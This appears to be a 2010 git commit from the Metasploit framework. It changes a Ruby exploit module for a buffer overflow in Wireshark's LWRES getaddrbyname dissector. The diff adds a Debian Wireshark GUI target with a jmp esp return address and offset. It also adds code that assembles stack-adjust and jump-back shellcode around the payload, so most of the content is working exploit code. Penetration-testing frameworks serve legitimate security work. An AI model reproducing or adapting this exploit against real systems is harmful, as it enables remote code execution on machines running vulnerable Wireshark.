add silly jmp esp target for wireshark gui on debian

git-svn-id: file:///home/svn/framework3/trunk@8360 4d416f70-5f16-0410-b530-b9f4589650da
2010-02-03 00:08:28 +00:00 · 2010-02-03 00:08:28 +00:00 · a41647a922
parent 4e582bd10b
commit a41647a922
1 changed files with 19 additions and 5 deletions
--- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb
+++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb
@ -78,10 +78,14 @@ class Metasploit3 < Msf::Exploit::Remote
 						{
 							'Arch'      => ARCH_X86,
 							'Platform'  => 'linux',
-							'Ret'       => 0xdeadbeef,   # see tshark target (same deal, diff addr)
+							# the method for tshark doesn't work, since there aren't any convenient
+							# pointers lying around (in reg/close on stack)
+							#
+							# since the wireshark bin has a jmp esp, we'll just use that method..
+							'Ret'       => 0x818fce8,    # jmp esp in wireshark bin
 							'RetOff'    => 376,
-							'Readable'  => 0x8066a40,    # just any old readable addr
-							'GotAddr'   => 0x818601c     # objdump -R wireshark | grep g_slist_append
+							'Readable'  => 0x8066a40,    # just any old readable addr (unused)
+							'GotAddr'   => 0x818601c     # objdump -R wireshark | grep g_slist_append (unused)
 						}
 					],

@ -129,7 +133,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		ret_offset = target['RetOff']

 		# we have different techniques depending on the target
-		if (target.name =~ /Debian 5\.0\.3/)
+		if (target == targets[0])
+			# debian tshark
 			str = make_nops(ret_offset - payload.encoded.length - 16)
 			str << payload.encoded
 			str << [target['GotAddr'] - 0xc].pack('V')
@ -137,7 +142,16 @@ class Metasploit3 < Msf::Exploit::Remote
 			str << [target['Readable']].pack('V')
 			str << rand_text(4)
 			# ret is next
-			#str = Rex::Text.pattern_create(ret_offset)
+		elsif (target == targets[1])
+			fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string
+			str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)
+			str << fix_esp
+			str << payload.encoded
+			# jmp esp...
+			str << [target.ret].pack('V')
+			# jump back
+			distance = ret_offset + 4
+			str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
 		else
 			# this is just a simple DoS payload
 			str = Rex::Text.pattern_create(ret_offset)